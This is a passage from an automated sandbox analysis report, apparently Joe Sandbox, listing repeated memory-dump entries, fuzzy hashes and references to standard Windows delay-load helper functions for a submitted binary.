                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileType
                                                                                    • String ID:
                                                                                    • API String ID: 3081899298-0
                                                                                    • Opcode ID: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
                                                                                    • Instruction ID: 1fb0e3154a6043a8d13b8d0db464858d1214f0d85553763f3737c6482a8f597e
                                                                                    • Opcode Fuzzy Hash: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
                                                                                    • Instruction Fuzzy Hash: AAC01274400105C59E73462894440957751AA42279BB486D4D0AC891D3C333C547EB10
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 6b27047d551c094225fa10cc201edd48a872d2288f3244810cdc5bb864228367
                                                                                    • Instruction ID: 5ff96de9461d4158f60c1b91e5365f93a8f1105dc464786ec99da415e3066450
                                                                                    • Opcode Fuzzy Hash: 6b27047d551c094225fa10cc201edd48a872d2288f3244810cdc5bb864228367
                                                                                    • Instruction Fuzzy Hash: 85B012E5258101FC30051196DD06CBF111CF6C2A10320842FFCCADC484D8449C410471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: fab5e3af31f04a0a31b1398938baa0f89f71afdb44e88839223d9ecf3cbb8e7a
                                                                                    • Instruction ID: ca840653b39987abb5a73845b38773fea99e3f6d3893212e7b8b6933f2efc414
                                                                                    • Opcode Fuzzy Hash: fab5e3af31f04a0a31b1398938baa0f89f71afdb44e88839223d9ecf3cbb8e7a
                                                                                    • Instruction Fuzzy Hash: 24B012E525C101EC3005519ADD06CBF111CF6C1910320402FFCCECC084D8445C410571
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: bff7b3a8d121b01c051bb420b9bf95d8aba96cf310e8717b5230441f12f3c440
                                                                                    • Instruction ID: 0bf389340c27f92d10abb063e0b80ad5b6fff3411c75cd12cbb4e7e8c97b338e
                                                                                    • Opcode Fuzzy Hash: bff7b3a8d121b01c051bb420b9bf95d8aba96cf310e8717b5230441f12f3c440
                                                                                    • Instruction Fuzzy Hash: 70B012E1258001EC30055656DD05CBF111CF6C1A20320C02FFCCECC184D8449C450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 4bf480fb42819d87d6ea78b6d3be9e05231d8e84a45f5f434e8a7a9d0d54e2cc
                                                                                    • Instruction ID: 16b6728ec751a05294144d33f3e699467f803e35b0dea1ccac81917338dd6c99
                                                                                    • Opcode Fuzzy Hash: 4bf480fb42819d87d6ea78b6d3be9e05231d8e84a45f5f434e8a7a9d0d54e2cc
                                                                                    • Instruction Fuzzy Hash: 9EB012E1368141FD30455256DD05CBF111CF6C0920320812FFCCECC184D8445C850471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 5ad2404d985bae6c0c62a8073c4742a55d3166dffb5b074b7445e39b6b4ef89c
                                                                                    • Instruction ID: cd70605c8cdcf644768da5b1626b17a05adff152b0e3ca669021a47e8f7d4e34
                                                                                    • Opcode Fuzzy Hash: 5ad2404d985bae6c0c62a8073c4742a55d3166dffb5b074b7445e39b6b4ef89c
                                                                                    • Instruction Fuzzy Hash: 38B012E1258001EC30055256DE05CBF111CF6C0920320802FFCCECC184DC445D4A0471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 2ae7688a7df7a270238c71aed01d3d17fd48da2f69d9ae0f23d950418f1dec7d
                                                                                    • Instruction ID: 10525fe6a56efb750e824890774332c6b5c10526b59e977fc2a31927558e2381
                                                                                    • Opcode Fuzzy Hash: 2ae7688a7df7a270238c71aed01d3d17fd48da2f69d9ae0f23d950418f1dec7d
                                                                                    • Instruction Fuzzy Hash: 8AB012F1258001FC30055156DD05CBF115CF6C1F10320802FFCCECC084D8449D450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 0825d0a704fd763b3dc4f04e5af1b422bf677ec2c569960e0afc5a6d213a30a0
                                                                                    • Instruction ID: 9782547166103dc46d1bf7ea15c09e8f14cc583ac68d401e17357ed581be974d
                                                                                    • Opcode Fuzzy Hash: 0825d0a704fd763b3dc4f04e5af1b422bf677ec2c569960e0afc5a6d213a30a0
                                                                                    • Instruction Fuzzy Hash: 4FB012F1258101FD30455156DD05CBF115CF6C0E10320412FFCCECC084D8445D8104B1
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 8d575f865741a4df0baeb54127af3c04b4c9fb85e371331ec3e64ed30c471e7e
                                                                                    • Instruction ID: 7355c22bbead29b5bc7e7ce2fceab7e32abb78ff286265dfe9fce92d2ab4fa88
                                                                                    • Opcode Fuzzy Hash: 8d575f865741a4df0baeb54127af3c04b4c9fb85e371331ec3e64ed30c471e7e
                                                                                    • Instruction Fuzzy Hash: 89B012F1258001EC30055556DE05CBF115CF6C0E10320402FFCCECC084DC445E420471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 36ffa3ef381845597bff9e9cf7ad8e66aa9dd98071fab1933a1aa2619ef56f98
                                                                                    • Instruction ID: 5cbcc7a153bbe98248640cd6314caa06239b6ad8fb61148a845c1e3f408d876b
                                                                                    • Opcode Fuzzy Hash: 36ffa3ef381845597bff9e9cf7ad8e66aa9dd98071fab1933a1aa2619ef56f98
                                                                                    • Instruction Fuzzy Hash: 28B012F1258001EC30055157DD05CBF115CF6D0E10320402FFCCECC084D8445D410471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 7e56146bb6faf583ef3a7f66dc07e24a3c726d7ab3b9c1f2a9557c37eae3da28
                                                                                    • Instruction ID: b2c40ba8b135e5448102529fdf150c7e7cbd843928fca5f99796b982c1c566cf
                                                                                    • Opcode Fuzzy Hash: 7e56146bb6faf583ef3a7f66dc07e24a3c726d7ab3b9c1f2a9557c37eae3da28
                                                                                    • Instruction Fuzzy Hash: 89B012E1259041EC30055156DD05CBF111DF7C1A10320802FFCCECC084D8449C410471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 61786e111ea5a4bfa2e694ba476e684aaeda231b3351de3de1067acd08a26021
                                                                                    • Instruction ID: 83637c04ff00bce7e9de6fc22033e93fd6ad7be8891bbc49264a001c40495572
                                                                                    • Opcode Fuzzy Hash: 61786e111ea5a4bfa2e694ba476e684aaeda231b3351de3de1067acd08a26021
                                                                                    • Instruction Fuzzy Hash: 75B012F1259141FD30455256DD05CBF111DF7C0910320412FFCCECC084D8445C850471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 61a58f0c34e376a829010ba3c9ca1aa0f92c52d297055c9529ce88e773049cfc
                                                                                    • Instruction ID: e0aeba5ee79d3d2f03f4d34176bdcea84196a858ca29dcb6d883c46ef0b75eff
                                                                                    • Opcode Fuzzy Hash: 61a58f0c34e376a829010ba3c9ca1aa0f92c52d297055c9529ce88e773049cfc
                                                                                    • Instruction Fuzzy Hash: 2CB012E1269041EC30055156DD05CBF115DFBC0910320402FFCCFCC084D8445C410471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: dd9d81f14d043ba74f8aae6b16c608f23e1dd455fedda3cf00b38ee2b8a10492
                                                                                    • Instruction ID: bd6ff8c7039774ba3754c8e646c49a5dd1b1b0c8236d03d57bf20b011aae1a85
                                                                                    • Opcode Fuzzy Hash: dd9d81f14d043ba74f8aae6b16c608f23e1dd455fedda3cf00b38ee2b8a10492
                                                                                    • Instruction Fuzzy Hash: C2B012E1258001EC30055166DD05CBF115CF6C1A10320802FFCCECC084D844DD810471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 7b8a396523309b72332c461f060e6cff52a9fa719689d5781bd86f313d15e5e9
                                                                                    • Instruction ID: fd1418eb35aaa4a8b0adb9ea5527ebfd145f80f6751442d17db9b6e78c47552c
                                                                                    • Opcode Fuzzy Hash: 7b8a396523309b72332c461f060e6cff52a9fa719689d5781bd86f313d15e5e9
                                                                                    • Instruction Fuzzy Hash: 45B012F1258001EC30055156DE05CBF119CF6C0910320402FFCCECC084DC445E820471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
